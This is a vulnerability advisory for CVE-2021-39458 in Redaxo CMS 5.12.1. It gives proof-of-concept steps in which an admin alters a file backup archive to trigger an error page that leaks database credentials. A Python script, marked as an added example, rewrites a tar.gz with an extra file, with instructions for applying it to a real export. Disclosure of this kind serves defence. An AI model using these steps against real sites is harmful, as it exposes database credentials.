CVE-2021-39458
Database information leak
- Vendor: Yakamara Media
- Product: Redaxo CMS
- Version: 5.12.1
An authenticated admin user can add new files to a valid file backup archive of Redaxo CMS and restore the modified archive to trigger an error page that leaks database credentials contained in the environment variables.
Steps for proof of concept:
- Create a file backup that contains the media folder
- Add a new file to the media folder inside the archive with 7-Zip
- Upload the modified backup archive in the import tab and choose the file under "Restore file backup"
- The changed checksum causes the error page to be displayed
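The archive modification in step 2 can also be done without 7-Zip. The script below is an added example and not part of the advisory or of the Redaxo project; it assumes that a Redaxo file backup is a gzip-compressed tar archive (an assumption here, not stated above) and works on a small constructed stand-in archive rather than a real export. Because a gzip stream cannot be appended in place, the archive is rewritten member by member with one extra file added, which is what changes the archive's checksum.

```python
import io
import tarfile


def add_file_to_tar_gz(archive_bytes: bytes, name: str, data: bytes) -> bytes:
    """Return a new .tar.gz containing every member of `archive_bytes`
    plus one extra regular file `name` with content `data`.

    The archive is rewritten because gzip streams cannot be appended to:
    existing members are copied with their metadata, then the new file
    is added at the end of the tar stream.
    """
    out = io.BytesIO()
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as src, \
            tarfile.open(fileobj=out, mode="w:gz") as dst:
        for member in src.getmembers():
            # extractfile() returns None for directories and links,
            # which addfile() accepts as "no payload".
            payload = src.extractfile(member) if member.isfile() else None
            dst.addfile(member, payload)
        info = tarfile.TarInfo(name=name)
        info.size = len(data)
        dst.addfile(info, io.BytesIO(data))
    return out.getvalue()


def list_members(archive_bytes: bytes) -> list:
    """Names of all entries in a .tar.gz, in archive order."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        return tar.getnames()


def build_sample_backup() -> bytes:
    """Constructed stand-in for an exported file backup: a .tar.gz
    holding a media folder with a single (fake) file. Not a real
    Redaxo export; the layout is assumed for this example."""
    out = io.BytesIO()
    with tarfile.open(fileobj=out, mode="w:gz") as tar:
        content = b"\x89PNG fake image bytes"
        info = tarfile.TarInfo(name="media/logo.png")
        info.size = len(content)
        tar.addfile(info, io.BytesIO(content))
    return out.getvalue()


if __name__ == "__main__":
    original = build_sample_backup()
    modified = add_file_to_tar_gz(original, "media/extra.txt", b"added after export\n")
    print("original:", list_members(original))
    print("modified:", list_members(modified))
    print("archive bytes changed:", original != modified)
```

Run against a real export by reading the downloaded backup into `archive_bytes` and writing the returned bytes to a new file, then upload that file in the import tab as described in step 3.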
